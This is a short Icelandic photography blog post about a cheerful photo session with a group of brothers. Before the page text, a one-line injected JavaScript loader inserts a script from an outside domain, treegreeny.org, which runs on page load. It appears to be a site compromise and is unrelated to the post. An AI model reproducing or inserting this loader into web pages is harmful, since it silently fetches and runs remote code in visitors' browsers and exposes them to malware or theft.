;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Strákar verða strákar – Eydís — Ljósmyndun

Strákar verða strákar

_MG_4018-EditÞetta voru skemmtilegir strákar. Heilmiklir karakterar og eins og bræðra er vísa var svolítið um rifrildi þeirra á milli en þeim þótti greinilega mjög vænt um hvorn annan. Kraftmiklir og hláturmildir og yndislegt að sjá hlýleikann á milli allra í fjölskyldunni.  Undir lokin voru þeir farnir að rífast um hvern þeirra ég ætti næst að mynda, alveg óborganlegir. Stundum reyna myndatökur á , aðrar líða áreynslulaust fyrir sig og svo eru aðrar sem fylla mann fítonskrafti. Þessi var þannig, ég fór í skemmtilegu skapi frá þeim. Takk fyrir myndatökuna strákar!

Leave a Reply

Your email address will not be published. Required fields are marked *